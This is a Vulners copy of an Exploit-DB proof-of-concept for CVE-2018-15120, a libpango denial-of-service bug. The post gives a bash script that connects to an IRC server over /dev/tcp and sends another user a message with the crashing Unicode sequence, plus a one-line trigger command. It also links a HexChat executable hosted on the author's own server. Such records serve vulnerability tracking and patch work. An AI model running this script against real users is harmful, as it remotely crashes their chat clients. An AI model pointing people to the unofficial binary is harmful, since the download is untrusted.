Lucene search
K

Libpango 1.40.8 - Denial of Service (PoC)

🗓️ 27 Aug 2018 00:00:00Reported by Jeffery MType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 61 Views

Libpango 1.40.8 Denial of Service (PoC

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Libpango 1.40.8 - Denial of Service Exploit
28 Aug 201800:00
zdt
FreeBSD
pango -- remote DoS vulnerability
6 Aug 201800:00
freebsd
AlpineLinux
CVE-2018-15120
24 Aug 201819:00
alpinelinux
Cloud Foundry
USN-3750-1: Pango vulnerability | Cloud Foundry
11 Sep 201800:00
cloudfoundry
Circl
CVE-2018-15120
28 Aug 201809:26
circl
CNVD
Pango Denial of Service Vulnerability
27 Aug 201800:00
cnvd
CVE
CVE-2018-15120
24 Aug 201819:00
cve
Cvelist
CVE-2018-15120
24 Aug 201819:00
cvelist
Debian CVE
CVE-2018-15120
24 Aug 201819:00
debiancve
Oracle linux
GNOME security, bug fix, and enhancement update
5 Nov 201800:00
oraclelinux
Rows per page
# Exploit Title: Libpango 1.40.8 - Denial of Service (PoC)
# Date: 2018-08-06
# Exploit Author: Jeffery M
# Vendor Homepage: https://www.pango.org/
# Software Link: http://ftp.gnome.org/pub/GNOME/sources/pango/1.40/pango-1.40.9.tar.xz
# Version: 1.40.8+
# Tested on: Windows 7, Gentoo
# CVE : CVE-2018-15120

# Patch : https://github.com/GNOME/pango/commit/71aaeaf020340412b8d012fe23a556c0420eda5f

# Description:
# Invalid Unicode sequences, such as 0x2665 0xfe0e 0xfe0f, can trick the
# Emoji iter code into returning an empty segment, which then triggers
# an assertion in the itemizer.

# POC:
# Save the below as irc_com_dump; chmod +x irc_com_dump;connect to an
# irc server with something linked against libpango 1.40.8 or higher
# (e.g. hexchat 2.14.1 [ can be obtained on my server
# http://order.a.whore.website/HexChat%202.14.1%20x86.exe ), then run
# the following:

irc_com_dump $'privmsg someuser :\u2665\uFE0E\uFE0F'

This is a rudimentary example of how this attack can be used.

#!/bin/bash
# Name: irc_com_dump
# Save this script as irc_com_dump
# run as follows on irc.laks.ml or a server of your choice
# irc_com_dump $'privmsg someuser :\u2665\uFE0E\uFE0F'
# When the user receives the message it will trigger the assertion fail.
###
helpfunc ()
{
sed  -nre '/sed/d;/bash/,/###/{1d;s/^# //g;s/###//;p}' $0;

}
if [[ $# -lt 1 ]] || [[ $1 =~ ^-?-h ]] ; then
helpfunc && exit 1
fi


# So we can send unicode without having to do shit.
LC_ALL=en_US.utf8
export LC_ALL


export allargs=("$@")
#test_ping ()
#{
#        if [[ ! -n $PING ]]; then
#       export PING="$(echo $h| awk '/PING/{print "PONG "$2}')";
#       fi;
#}
if [[ -n ${DEBUG} ]] ; then
declare -p allargs
fi

export name=magicrun${RANDOM}
if [[ -n ${NORANDOM} ]] ; then
        export name=magicdebug
fi
run_irc_com ()
{
set -vx
    echo ${allargs[1]}
#    if  ( ( ( [[ ! ${allargs[1]} =~ [a-zA-Z].* ]] || true) && ( [[
${allargs[1]} =~ [0-9].*[0-9] ]] &&  [[ ! ${allargs[0]}  =~ .*[.].*
]] || true) ) )     ; then
if [[ ! ${allargs[0]}  =~ .*[.].* &&  ${allargs[1]} =~ ^[0-9]+[0-9]?$
&& ! ${allargs[1]} =~ .*[a-zA-Z].* || $# -eq 1 ]] ; then
    export COMM="$@";
    else
    export s=$1
    export p=$2
    export COMM="${@:3}"
        if [[ $p =~ .*[a-zA-Z] ]] ; then
                unset s p
                export COMM="${allargs[@]}"
        fi
    fi

    test -z $s||false  && exec 5<> /dev/tcp/irc.laks.ml/6667 || test
-n $s && echo s is $s;exec 5<>/dev/tcp/$s/$p
set +vx
    echo -e 'USER '${name}' 8 ''*'' :'${name}'\nNICK '${name}'\n' 1>&5
2>&1 | stdbuf -i0 -o0 cat - 0<&5 > /dev/stdout | while read h; do
        if [[ ! -n $PING ]]; then
            export PING="$(echo $h| awk '/PING/{print "PONG "$2}')";
        fi;
##      test_ping;
echo -e "${PING}\n" 1>&5
        if [[ ! -n $PINGSENT ]] && [[ -n $PING ]] ; then
            export PINGSENT=isentmyping;
        fi;
        if [[ -z $COMMSENT ]] && [[ -n $PINGSENT ]] && [[ -n $PING ]] ; then
echo -e "${COMM}\nQUIT\n" 1>&5 2>&1
fi
        echo "$h" 2>&1;
    done

}

run_irc_com ${allargs[@]} |& sed -ne "/:$name MODE $name
:+iwx/,/\x04/p" | sed -e "/:$name MODE $name/d" -e '/^ERROR
:Closing/d' | awk -F" $name " '{print $2}'

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Aug 2018 00:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 24.3
CVSS 3.16.5
EPSS0.05613
61